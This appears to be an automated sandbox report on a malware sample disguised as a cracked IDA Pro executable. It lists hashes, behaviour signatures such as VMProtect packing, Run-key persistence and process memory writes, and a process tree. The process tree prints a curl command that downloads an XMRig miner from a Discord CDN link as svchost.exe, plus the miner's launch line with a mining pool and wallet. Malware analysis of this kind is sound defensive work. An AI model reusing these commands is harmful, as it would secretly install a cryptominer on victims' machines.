Analysis

  • max time kernel
    121s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    25-07-2024 00:48

General

  • Target

    IDA-Pro-main/ida.exe

  • Size

    257KB

  • MD5

    062ed7603d36e3dc4734e52697961972

  • SHA1

    0a254737a34c14e3963e1420d3a039a5b6fab16d

  • SHA256

    0ca0a6d4508bd457a7d3a69d6a43168a96eb896dd89c8473665e5fab05a30a6a

  • SHA512

    68c1583e29ac88575b90b7d4826b8917771c8738afcf7c9e6497a185ba424c3be5e840fe7e4bde8b634d442b9b109c8f8ec00f4ff88800923fb0526e369eec41

  • SSDEEP

    3072:S4OAN18ZH2Mit33scQBFeUSJyFxTY0Nhv6ZsPV3i6e/GDdiyZ9eAM+PwAU2FuIdu:9Sjk33scYFeUSEFxEkhvFZuG5ZnPtuv

Malware Config

Signatures

  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\IDA-Pro-main\ida.exe
    "C:\Users\Admin\AppData\Local\Temp\IDA-Pro-main\ida.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2356
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1197348604298403910/1202817866651664404/xmrig.vmp.exe -o "C:\Users\Admin\AppData\Local\svchost.exe" >nul
      2⤵
        PID:2824
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\svchost.exe" --background --title svchostmon --url pool.hashvault.pro:80 --user 44ZEJE6ALgPEY6YBMDSWAH88U7dqRU3ZLReuea7jUzAFfgiK5wyRzK6fSYdhQVtkJD7YjKmN3WvT9gfgBwX9bKag9WUmC8G --pass Evq2nPuH54 --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
        2⤵
          PID:2904

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/2356-0-0x000007FEF5F97000-0x000007FEF6309000-memory.dmp

        Filesize

        3.4MB

      • memory/2356-1-0x0000000077AD0000-0x0000000077AD2000-memory.dmp

        Filesize

        8KB

      • memory/2356-6-0x0000000077AE0000-0x0000000077AE2000-memory.dmp

        Filesize

        8KB

      • memory/2356-11-0x000007FEF5F90000-0x000007FEF6854000-memory.dmp

        Filesize

        8.8MB

      • memory/2356-10-0x0000000077AE0000-0x0000000077AE2000-memory.dmp

        Filesize

        8KB

      • memory/2356-8-0x0000000077AE0000-0x0000000077AE2000-memory.dmp

        Filesize

        8KB

      • memory/2356-5-0x0000000077AD0000-0x0000000077AD2000-memory.dmp

        Filesize

        8KB

      • memory/2356-3-0x0000000077AD0000-0x0000000077AD2000-memory.dmp

        Filesize

        8KB

      • memory/2356-12-0x000007FEF5F90000-0x000007FEF6854000-memory.dmp

        Filesize

        8.8MB

      • memory/2356-14-0x000007FEF5F90000-0x000007FEF6854000-memory.dmp

        Filesize

        8.8MB

      • memory/2356-13-0x000007FEF5F97000-0x000007FEF6309000-memory.dmp

        Filesize

        3.4MB